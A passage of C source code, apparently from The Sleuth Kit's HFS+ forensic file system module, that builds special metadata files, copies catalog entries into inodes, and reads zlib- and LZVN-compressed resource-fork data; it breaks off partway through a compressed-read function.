error_returned(" - hfs_make_startfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_startfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_STARTUP_FILE_ID, fs_attr,
TRUE)) {
error_returned(" - hfs_make_startfile");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the Start file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the attributes file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_attrfile(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_attrfile: Making virtual attributes file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_attrfile");
return 1;
}
fs_file->meta->addr = HFS_ATTRIBUTES_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_ATTRIBUTESNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->attr_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_attrfile");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_attrfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_attrfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_ATTRIBUTES_FILE_ID,
fs_attr, TRUE)) {
error_returned(" - hfs_make_attrfile");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
//hfs_load_extended_attrs(fs_file);
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_FILE structure for the BadBlocks file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_badblockfile(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_ATTR *fs_attr;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_badblockfile: Making virtual badblock file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_badblockfile");
return 1;
}
fs_file->meta->addr = HFS_BAD_BLOCK_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_BAD_BLOCK_FILE_NAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size = 0;
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_badblockfile");
return 1;
}
// add the run to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, NULL, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
fs_file->meta->size, fs_file->meta->size, fs_file->meta->size,
0, 0)) {
error_returned(" - hfs_make_badblockfile");
return 1;
}
// see if file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_BAD_BLOCK_FILE_ID,
fs_attr, TRUE)) {
error_returned(" - hfs_make_badblockfile");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
/* @@@ We have a chicken and egg problem here... The current design of
* fs_attr_set() requires the size to be set, but we dont' know the size
* until we look into the extents file (which adds to an attribute...).
* This does not seem to be the best design... neeed a way to test this. */
fs_file->meta->size = fs_attr->nrd.initsize;
fs_attr->size = fs_file->meta->size;
fs_attr->nrd.allocsize = fs_file->meta->size;
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the BadBlocks file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/** \internal
* Copy the catalog file or folder record entry into a TSK data structure.
* @param a_hfs File system being analyzed
* @param a_hfs_entry Catalog record entry (HFS_ENTRY *)
* @param a_fs_file Structure to copy data into (TSK_FS_FILE *)
* Returns 1 on error.
*/
static uint8_t
hfs_dinode_copy(HFS_INFO * a_hfs, const HFS_ENTRY * a_hfs_entry,
TSK_FS_FILE * a_fs_file)
{
// Note, a_hfs_entry->cat is really of type hfs_file. But, hfs_file_folder is a union
// of that type with hfs_folder. Both of hfs_file and hfs_folder have the same first member.
// So, this cast is appropriate.
const hfs_file_folder *a_entry =
(hfs_file_folder *) & (a_hfs_entry->cat);
const hfs_file_fold_std *std;
TSK_FS_META *a_fs_meta = a_fs_file->meta;
TSK_FS_INFO *fs;
uint16_t hfsmode;
TSK_INUM_T iStd; // the inum (or CNID) that occurs in the standard file metadata
if (a_entry == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_dinode_copy: a_entry = a_hfs_entry->cat is NULL");
return 1;
}
fs = (TSK_FS_INFO *) & a_hfs->fs_info;
// Just a sanity check. The inum (or cnid) occurs in two places in the
// entry data structure.
iStd = tsk_getu32(fs->endian, a_entry->file.std.cnid);
if (iStd != a_hfs_entry->inum) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_dinode_copy: HFS_ENTRY with conflicting values for inum (or cnid).\n");
}
if (a_fs_meta == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("hfs_dinode_copy: a_fs_meta is NULL");
return 1;
}
// both files and folders start off the same
std = &(a_entry->file.std);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_dinode_copy: called for file/folder %" PRIu32 "\n",
tsk_getu32(fs->endian, std->cnid));
if (a_fs_meta->content_len < HFS_FILE_CONTENT_LEN) {
if ((a_fs_meta =
tsk_fs_meta_realloc(a_fs_meta,
HFS_FILE_CONTENT_LEN)) == NULL) {
return 1;
}
}
a_fs_meta->attr_state = TSK_FS_META_ATTR_EMPTY;
if (a_fs_meta->attr) {
tsk_fs_attrlist_markunused(a_fs_meta->attr);
}
/*
* Copy the file type specific stuff first
*/
hfsmode = tsk_getu16(fs->endian, std->perm.mode);
if (tsk_getu16(fs->endian, std->rec_type) == HFS_FOLDER_RECORD) {
// set the type of mode is not set
if ((hfsmode & HFS_IN_IFMT) == 0)
a_fs_meta->type = TSK_FS_META_TYPE_DIR;
a_fs_meta->size = 0;
memset(a_fs_meta->content_ptr, 0, HFS_FILE_CONTENT_LEN);
}
else if (tsk_getu16(fs->endian, std->rec_type) == HFS_FILE_RECORD) {
hfs_fork *fork;
// set the type of mode is not set
if ((hfsmode & HFS_IN_IFMT) == 0)
a_fs_meta->type = TSK_FS_META_TYPE_REG;
a_fs_meta->size =
tsk_getu64(fs->endian, a_entry->file.data.logic_sz);
// copy the data and resource forks
fork = (hfs_fork *) a_fs_meta->content_ptr;
memcpy(fork, &(a_entry->file.data), sizeof(hfs_fork));
memcpy(&fork[1], &(a_entry->file.resource), sizeof(hfs_fork));
}
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_dinode_copy error: catalog entry is neither file nor folder\n");
return 1;
}
/*
* Copy the standard stuff.
* Use default values (as defined in spec) if mode is not defined.
*/
if ((hfsmode & HFS_IN_IFMT) == 0) {
a_fs_meta->mode = 0;
a_fs_meta->uid = 99;
a_fs_meta->gid = 99;
}
else {
a_fs_meta->mode = hfs_mode_to_tsk_mode(hfsmode);
a_fs_meta->type = hfs_mode_to_tsk_meta_type(hfsmode);
a_fs_meta->uid = tsk_getu32(fs->endian, std->perm.owner);
a_fs_meta->gid = tsk_getu32(fs->endian, std->perm.group);
}
// this field is set only for "indirect" entries
if (tsk_getu32(fs->endian, std->perm.special.nlink))
a_fs_meta->nlink = tsk_getu32(fs->endian, std->perm.special.nlink);
else
a_fs_meta->nlink = 1;
a_fs_meta->mtime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->cmtime));
a_fs_meta->atime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->atime));
a_fs_meta->crtime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->crtime));
a_fs_meta->ctime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->amtime));
a_fs_meta->time2.hfs.bkup_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->bkup_date));
a_fs_meta->mtime_nano = a_fs_meta->atime_nano = a_fs_meta->ctime_nano =
a_fs_meta->crtime_nano = 0;
a_fs_meta->time2.hfs.bkup_time_nano = 0;
a_fs_meta->addr = tsk_getu32(fs->endian, std->cnid);
// All entries here are used.
a_fs_meta->flags = TSK_FS_META_FLAG_ALLOC | TSK_FS_META_FLAG_USED;
if (std->perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)
a_fs_meta->flags |= TSK_FS_META_FLAG_COMP;
// We copy this inum (or cnid) here, because this file *might* have been a hard link. In
// that case, we want to make sure that a_fs_file points consistently to the target of the
// link.
if (a_fs_file->name != NULL) {
a_fs_file->name->meta_addr = a_fs_meta->addr;
}
/* TODO @@@ could fill in name2 with this entry's name and parent inode
from Catalog entry */
/* set the link string (if the file is a link)
* The size check is a sanity check so that we don't try to allocate
* a huge amount of memory for a bad inode value
*/
if ((a_fs_meta->type == TSK_FS_META_TYPE_LNK) &&
(a_fs_meta->size >= 0) && (a_fs_meta->size < HFS_MAXPATHLEN)) {
ssize_t bytes_read;
a_fs_meta->link = tsk_malloc((size_t) a_fs_meta->size + 1);
if (a_fs_meta->link == NULL)
return 1;
bytes_read = tsk_fs_file_read(a_fs_file, (TSK_OFF_T) 0,
a_fs_meta->link, (size_t) a_fs_meta->size,
TSK_FS_FILE_READ_FLAG_NONE);
a_fs_meta->link[a_fs_meta->size] = '\0';
if (bytes_read != a_fs_meta->size) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_dinode_copy: failed to read contents of symbolic link; "
"expected %u bytes but tsk_fs_file_read() returned %u\n",
a_fs_meta->size, bytes_read);
free(a_fs_meta->link);
a_fs_meta->link = NULL;
return 1;
}
}
return 0;
}
/** \internal
* Load a catalog file entry and save it in the TSK_FS_FILE structure.
*
* @param fs File system to read from.
* @param a_fs_file Structure to read into.
* @param inum File address to load
* @returns 1 on error
*/
static uint8_t
hfs_inode_lookup(TSK_FS_INFO * fs, TSK_FS_FILE * a_fs_file,
TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
HFS_ENTRY entry;
if (a_fs_file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("hfs_inode_lookup: fs_file is NULL");
return 1;
}
if (a_fs_file->meta == NULL) {
a_fs_file->meta = tsk_fs_meta_alloc(HFS_FILE_CONTENT_LEN);
}
if (a_fs_file->meta == NULL) {
return 1;
}
else {
tsk_fs_meta_reset(a_fs_file->meta);
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_inode_lookup: looking up %" PRIuINUM "\n",
inum);
// @@@ Will need to add orphan stuff here too
/* First see if this is a special entry
* the special ones have their metadata stored in the volume header */
if (inum == HFS_EXTENTS_FILE_ID) {
if (!hfs->has_extents_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"Extents File not present");
return 1;
}
return hfs_make_extents(hfs, a_fs_file);
}
else if (inum == HFS_CATALOG_FILE_ID) {
return hfs_make_catalog(hfs, a_fs_file);
}
else if (inum == HFS_BAD_BLOCK_FILE_ID) {
// Note: the Extents file and the BadBlocks file are really the same.
if (!hfs->has_extents_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"BadBlocks File not present");
return 1;
}
return hfs_make_badblockfile(hfs, a_fs_file);
}
else if (inum == HFS_ALLOCATION_FILE_ID) {
return hfs_make_blockmap(hfs, a_fs_file);
}
else if (inum == HFS_STARTUP_FILE_ID) {
if (!hfs->has_startup_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"Startup File not present");
return 1;
}
return hfs_make_startfile(hfs, a_fs_file);
}
else if (inum == HFS_ATTRIBUTES_FILE_ID) {
if (!hfs->has_attributes_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"Attributes File not present");
return 1;
}
return hfs_make_attrfile(hfs, a_fs_file);
}
/* Lookup inode and store it in the HFS structure */
if (hfs_cat_file_lookup(hfs, inum, &entry, TRUE)) {
return 1;
}
/* Copy the structure in hfs to generic fs_inode */
if (hfs_dinode_copy(hfs, &entry, a_fs_file)) {
return 1;
}
/* If this is potentially a compressed file, its
* actual size is unknown until we examine the
* extended attributes */
if ((a_fs_file->meta->size == 0) &&
(a_fs_file->meta->type == TSK_FS_META_TYPE_REG) &&
(a_fs_file->meta->attr_state != TSK_FS_META_ATTR_ERROR) &&
((a_fs_file->meta->attr_state != TSK_FS_META_ATTR_STUDIED) ||
(a_fs_file->meta->attr == NULL))) {
hfs_load_attrs(a_fs_file);
}
return 0;
}
typedef struct {
uint32_t offset;
uint32_t length;
} CMP_OFFSET_ENTRY;
static int
hfs_read_zlib_block_table(const TSK_FS_ATTR *rAttr, CMP_OFFSET_ENTRY** offsetTableOut, uint32_t* tableSizeOut, uint32_t* tableOffsetOut) {
int attrReadResult;
hfs_resource_fork_header rfHeader;
uint32_t dataOffset;
uint32_t offsetTableOffset;
char fourBytes[4]; // Size of the offset table, little endian
uint32_t tableSize; // Size of the offset table
char *offsetTableData = NULL;
CMP_OFFSET_ENTRY *offsetTable = NULL;
size_t indx;
// Read the resource fork header
attrReadResult = tsk_fs_attr_read(rAttr, 0, (char *) &rfHeader,
sizeof(hfs_resource_fork_header), TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != sizeof(hfs_resource_fork_header)) {
error_returned
(" %s: trying to read the resource fork header", __func__);
return 0;
}
// Begin to parse the resource fork. For now, we just need the data offset.
dataOffset = tsk_getu32(TSK_BIG_ENDIAN, rfHeader.dataOffset);
// The resource's data begins with an offset table, which defines blocks
// of (optionally) zlib-compressed data (so that the OS can do file seeks
// efficiently; each uncompressed block is 64KB).
offsetTableOffset = dataOffset + 4;
// read 4 bytes, the number of table entries, little endian
attrReadResult =
tsk_fs_attr_read(rAttr, offsetTableOffset, fourBytes, 4,
TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != 4) {
error_returned
(" %s: trying to read the offset table size, "
"return value of %u should have been 4", __func__, attrReadResult);
return 0;
}
tableSize = tsk_getu32(TSK_LIT_ENDIAN, fourBytes);
// Each table entry is 8 bytes long
offsetTableData = tsk_malloc(tableSize * 8);
if (offsetTableData == NULL) {
error_returned
(" %s: space for the offset table raw data", __func__);
return 0;
}
offsetTable =
(CMP_OFFSET_ENTRY *) tsk_malloc(tableSize *
sizeof(CMP_OFFSET_ENTRY));
if (offsetTable == NULL) {
error_returned
(" %s: space for the offset table", __func__);
goto on_error;
}
attrReadResult = tsk_fs_attr_read(rAttr, offsetTableOffset + 4,
offsetTableData, tableSize * 8, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != tableSize * 8) {
error_returned
(" %s: reading in the compression offset table, "
"return value %u should have been %u", __func__, attrReadResult,
tableSize * 8);
goto on_error;
}
for (indx = 0; indx < tableSize; ++indx) {
offsetTable[indx].offset =
tsk_getu32(TSK_LIT_ENDIAN, offsetTableData + indx * 8);
offsetTable[indx].length =
tsk_getu32(TSK_LIT_ENDIAN, offsetTableData + indx * 8 + 4);
}
free(offsetTableData);
*offsetTableOut = offsetTable;
*tableSizeOut = tableSize;
*tableOffsetOut = offsetTableOffset;
return 1;
on_error:
free(offsetTable);
free(offsetTableData);
return 0;
}
static int
hfs_read_lzvn_block_table(const TSK_FS_ATTR *rAttr, CMP_OFFSET_ENTRY** offsetTableOut, uint32_t* tableSizeOut, uint32_t* tableOffsetOut) {
int attrReadResult;
char fourBytes[4];
uint32_t tableDataSize;
uint32_t tableSize; // Size of the offset table
char *offsetTableData = NULL;
CMP_OFFSET_ENTRY *offsetTable = NULL;
// The offset table is a sequence of 4-byte offsets of compressed
// blocks. The first 4 bytes is thus the offset of the first block,
// but also 4 times the number of entries in the table.
attrReadResult = tsk_fs_attr_read(rAttr, 0, fourBytes, 4,
TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != 4) {
error_returned
(" %s: trying to read the offset table size, "
"return value of %u should have been 4", __func__, attrReadResult);
return 0;
}
tableDataSize = tsk_getu32(TSK_LIT_ENDIAN, fourBytes);
offsetTableData = tsk_malloc(tableDataSize);
if (offsetTableData == NULL) {
error_returned
(" %s: space for the offset table raw data", __func__);
return 0;
}
// table entries are 4 bytes, last entry is end of data
tableSize = tableDataSize / 4 - 1;
offsetTable =
(CMP_OFFSET_ENTRY *) tsk_malloc(tableSize *
sizeof(CMP_OFFSET_ENTRY));
if (offsetTable == NULL) {
error_returned
(" %s: space for the offset table", __func__);
goto on_error;
}
attrReadResult = tsk_fs_attr_read(rAttr, 0,
offsetTableData, tableDataSize, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != tableDataSize) {
error_returned
(" %s: reading in the compression offset table, "
"return value %u should have been %u", __func__, attrReadResult,
tableDataSize);
goto on_error;
}
uint32_t a = tableDataSize;
uint32_t b;
size_t i;
for (i = 0; i < tableSize; ++i) {
b = tsk_getu32(TSK_LIT_ENDIAN, offsetTableData + 4*(i+1));
offsetTable[i].offset = a;
offsetTable[i].length = b - a;
a = b;
}
free(offsetTableData);
*offsetTableOut = offsetTable;
*tableSizeOut = tableSize;
*tableOffsetOut = 0;
return 1;
on_error:
free(offsetTable);
free(offsetTableData);
return 0;
}
static int hfs_decompress_noncompressed_block(char* rawBuf, uint32_t len, char* uncBuf, uint64_t* uncLen) {
// actually an uncompressed block of data; just copy
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Copying an uncompressed compression unit\n", __func__);
if ((len - 1) > COMPRESSION_UNIT_SIZE) {
error_detected(TSK_ERR_FS_READ,
"%s: uncompressed block length %u is longer "
"than compression unit size %u", __func__, len - 1,
COMPRESSION_UNIT_SIZE);
return 0;
}
memcpy(uncBuf, rawBuf + 1, len - 1);
*uncLen = len - 1;
return 1;
}
#ifdef HAVE_LIBZ
static int hfs_decompress_zlib_block(char* rawBuf, uint32_t len, char* uncBuf, uint64_t* uncLen)
{
// see if this block is compressed
if (len > 0 && (rawBuf[0] & 0x0F) != 0x0F) {
// Uncompress the chunk of data
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Inflating the compression unit\n", __func__);
unsigned long bytesConsumed;
int infResult = zlib_inflate(rawBuf, (uint64_t) len,
uncBuf, (uint64_t) COMPRESSION_UNIT_SIZE,
uncLen, &bytesConsumed);
if (infResult != 0) {
error_returned
(" %s: zlib inflation (uncompression) failed",
__func__, infResult);
return 0;
}
if (bytesConsumed != len) {
error_detected(TSK_ERR_FS_READ,
" %s, decompressor did not consume the whole compressed data",
__func__);
return 0;
}
return 1;
}
else {
// actually an uncompressed block of data; just copy
return hfs_decompress_noncompressed_block(rawBuf, len, uncBuf, uncLen);
}
}
#endif
static int hfs_decompress_lzvn_block(char* rawBuf, uint32_t len, char* uncBuf, uint64_t* uncLen)
{
// see if this block is compressed
if (len > 0 && rawBuf[0] != 0x06) {
*uncLen = lzvn_decode_buffer(uncBuf, COMPRESSION_UNIT_SIZE, rawBuf, len);
return 1; // apparently this can't fail
}
else {
// actually an uncompressed block of data; just copy
return hfs_decompress_noncompressed_block(rawBuf, len, uncBuf, uncLen);
}
}
static ssize_t read_and_decompress_block(
const TSK_FS_ATTR* rAttr,
char* rawBuf,
char* uncBuf,
const CMP_OFFSET_ENTRY* offsetTable,
uint32_t offsetTableSize,
uint32_t offsetTableOffset,
size_t indx,
int (*decompress_block)(char* rawBuf,
uint32_t len,
char* uncBuf,
uint64_t* uncLen)
)
{
int attrReadResult;
uint32_t offset = offsetTableOffset + offsetTable[indx].offset;
uint32_t len = offsetTable[indx].length;
uint64_t uncLen;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Reading compression unit %d, length %d\n",
__func__, indx, len);
/* Github #383 referenced that if len is 0, then the below code causes
* problems. Added this check, but I don't have data to verify this on.
* it looks like it should at least not crash, but it isn't clear if it
* will also do the right thing and if should actually break here
* instead. */
if (len == 0) {
return 0;
}
if (len > COMPRESSION_UNIT_SIZE + 1) {
error_detected(TSK_ERR_FS_READ,
"%s: block size is too large: %u", __func__, len);
return -1;
}
// Read in the block of compressed data
attrReadResult = tsk_fs_attr_read(rAttr, offset,
rawBuf, len, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != len) {
char msg[] =
"%s%s: reading in the compression offset table, "
"return value %u should have been %u";
if (attrReadResult < 0 ) {
error_returned(msg, " ", __func__, attrReadResult, len);
}
else {
error_detected(TSK_ERR_FS_READ, "", __func__, attrReadResult, len);
}
return -1;
}
if (!decompress_block(rawBuf, len, uncBuf, &uncLen)) {
return -1;
}
// If size is a multiple of COMPRESSION_UNIT_SIZE,
// expected uncompressed length is COMPRESSION_UNIT_SIZE
const uint32_t expUncLen = indx == offsetTableSize - 1 ?
((rAttr->fs_file->meta->size - 1) % COMPRESSION_UNIT_SIZE) + 1 :
COMPRESSION_UNIT_SIZE;
if (uncLen != expUncLen) {
error_detected(TSK_ERR_FS_READ,
"%s: compressed block decompressed to %u bytes, "
"should have been %u bytes", __func__, uncLen, expUncLen);
return -1;
}
// There are now uncLen bytes of uncompressed data available from
// this comp unit.
return (ssize_t)uncLen;
}
static uint8_t
hfs_attr_walk_compressed_rsrc(const TSK_FS_ATTR * fs_attr,
int flags, TSK_FS_FILE_WALK_CB a_action, void *ptr,
int (*read_block_table)(const TSK_FS_ATTR *rAttr,
CMP_OFFSET_ENTRY** offsetTableOut,
uint32_t* tableSizeOut,
uint32_t* tableOffsetOut),
int (*decompress_block)(char* rawBuf,
uint32_t len,
char* uncBuf,
uint64_t* uncLen))
{
TSK_FS_INFO *fs;
TSK_FS_FILE *fs_file;
const TSK_FS_ATTR *rAttr; // resource fork attribute
char *rawBuf = NULL; // compressed data
char *uncBuf = NULL; // uncompressed data
uint32_t offsetTableOffset;
uint32_t offsetTableSize; // The number of table entries
CMP_OFFSET_ENTRY *offsetTable = NULL;
size_t indx; // index for looping over the offset table
TSK_OFF_T off = 0; // the offset in the uncompressed data stream consumed thus far
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Entered, because this is a compressed file with compressed data in the resource fork\n", __func__);
// clean up any error messages that are lying around
tsk_error_reset();
if ((fs_attr == NULL) || (fs_attr->fs_file == NULL)
|| (fs_attr->fs_file->meta == NULL)
|| (fs_attr->fs_file->fs_info == NULL)) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("%s: Null arguments given\n", __func__);
return 1;
}
// Check that the ATTR being read is the main DATA resource, 128-0,
// because this is the only one that can be compressed in HFS+
if ((fs_attr->id != HFS_FS_ATTR_ID_DATA) ||
(fs_attr->type != TSK_FS_ATTR_TYPE_HFS_DATA)) {
error_detected(TSK_ERR_FS_ARG,
"%s: arg specified an attribute %u-%u that is not the data fork, "
"Only the data fork can be compressed.", __func__, fs_attr->type,
fs_attr->id);
return 1;
}
/* This MUST be a compressed attribute */
if (!(fs_attr->flags & TSK_FS_ATTR_COMP)) {
error_detected(TSK_ERR_FS_FWALK,
"%s: called with non-special attribute: %x",
__func__, fs_attr->flags);
return 1;
}
fs = fs_attr->fs_file->fs_info;
fs_file = fs_attr->fs_file;
/******** Open the Resource Fork ***********/
// find the attribute for the resource fork
rAttr =
tsk_fs_file_attr_get_type(fs_file, TSK_FS_ATTR_TYPE_HFS_RSRC,
HFS_FS_ATTR_ID_RSRC, TRUE);
if (rAttr == NULL) {
error_returned
(" %s: could not get the attribute for the resource fork of the file", __func__);
return 1;
}
// read the offset table from the fork header
if (!read_block_table(rAttr, &offsetTable, &offsetTableSize, &offsetTableOffset)) {
return 1;
}
// Allocate two buffers for the raw and uncompressed data
/* Raw data can be COMPRESSION_UNIT_SIZE+1 if the data is not
* compressed and there is a 1-byte flag that indicates that
* the data is not compressed. */
rawBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE + 1);
if (rawBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
uncBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE);
if (uncBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
// FOR entry in the table DO
for (indx = 0; indx < offsetTableSize; ++indx) {
ssize_t uncLen; // uncompressed length
unsigned int blockSize;
uint64_t lumpSize;
uint64_t remaining;
char *lumpStart;
switch ((uncLen = read_and_decompress_block(
rAttr, rawBuf, uncBuf,
offsetTable, offsetTableSize, offsetTableOffset, indx,
decompress_block)))
{
case -1:
goto on_error;
case 0:
continue;
default:
break;
}
// Call the a_action callback with "Lumps"
// that are at most the block size.
blockSize = fs->block_size;
remaining = uncLen;
lumpStart = uncBuf;
while (remaining > 0) {
int retval; // action return value
lumpSize = remaining <= blockSize ? remaining : blockSize;
// Apply the callback function
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Calling action on lump of size %"
PRIu64 " offset %" PRIu64 " in the compression unit\n",
__func__, lumpSize, uncLen - remaining);
if (lumpSize > SIZE_MAX) {
error_detected(TSK_ERR_FS_FWALK,
" %s: lumpSize is too large for the action", __func__);
goto on_error;
}
retval = a_action(fs_attr->fs_file, off, 0, lumpStart,
(size_t) lumpSize, // cast OK because of above test
TSK_FS_BLOCK_FLAG_COMP, ptr);
if (retval == TSK_WALK_ERROR) {
error_detected(TSK_ERR_FS | 201,
"%s: callback returned an error", __func__);
goto on_error;
}
else if (retval == TSK_WALK_STOP) {
break;
}
// Find the next lump
off += lumpSize;
remaining -= lumpSize;
lumpStart += lumpSize;
}
}
// Done, so free up the allocated resources.
free(offsetTable);
free(rawBuf);
free(uncBuf);
return 0;
on_error:
free(offsetTable);
free(rawBuf);
free(uncBuf);
return 0;
}
#ifdef HAVE_LIBZ
static uint8_t
hfs_attr_walk_zlib_rsrc(const TSK_FS_ATTR * fs_attr,
int flags, TSK_FS_FILE_WALK_CB a_action, void *ptr)
{
return hfs_attr_walk_compressed_rsrc(
fs_attr, flags, a_action, ptr,
hfs_read_zlib_block_table,
hfs_decompress_zlib_block
);
}
#endif
static uint8_t
hfs_attr_walk_lzvn_rsrc(const TSK_FS_ATTR * fs_attr,
int flags, TSK_FS_FILE_WALK_CB a_action, void *ptr)
{
return hfs_attr_walk_compressed_rsrc(
fs_attr, flags, a_action, ptr,
hfs_read_lzvn_block_table,
hfs_decompress_lzvn_block
);
}
/** \internal
*
* @returns number of bytes read or -1 on error (incl if offset is past EOF)
*/
static ssize_t
hfs_file_read_compressed_rsrc(const TSK_FS_ATTR * a_fs_attr,
TSK_OFF_T a_offset, char *a_buf, size_t a_len,
int (*read_block_table)(const TSK_FS_ATTR *rAttr,
CMP_OFFSET_ENTRY** offsetTableOut,
uint32_t* tableSizeOut,
uint32_t* tableOffsetOut),
int (*decompress_block)(char* rawBuf,
uint32_t len,
char* uncBuf,
uint64_t* uncLen))
{
TSK_FS_FILE *fs_file;
const TSK_FS_ATTR *rAttr;
char *rawBuf = NULL;
char *uncBuf = NULL;
uint32_t offsetTableOffset;
uint32_t offsetTableSize; // Size of the offset table
CMP_OFFSET_ENTRY *offsetTable = NULL;
size_t indx; // index for looping over the offset table
uint32_t startUnit = 0;
uint32_t startUnitOffset = 0;
uint32_t endUnit = 0;
uint64_t bytesCopied;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: called because this file is compressed, with data in the resource fork\n", __func__);
// Reading zero bytes? OK at any offset, I say!
if (a_len == 0)
return 0;
if (a_offset < 0) {
error_detected(TSK_ERR_FS_ARG,
"%s: reading from file at a negative offset, or negative length",
__func__);
return -1;
}
if (a_len > SIZE_MAX / 2) {
error_detected(TSK_ERR_FS_ARG,
"%s: trying to read more than SIZE_MAX/2 is not supported.",
__func__);
return -1;
}
if ((a_fs_attr == NULL) || (a_fs_attr->fs_file == NULL)
|| (a_fs_attr->fs_file->meta == NULL)
|| (a_fs_attr->fs_file->fs_info == NULL)) {
error_detected(TSK_ERR_FS_ARG,
"%s: NULL parameters passed", __func__);
return -1;
}
// This should be a compressed file. If not, that's an error!
if (!(a_fs_attr->flags & TSK_FS_ATTR_COMP)) {
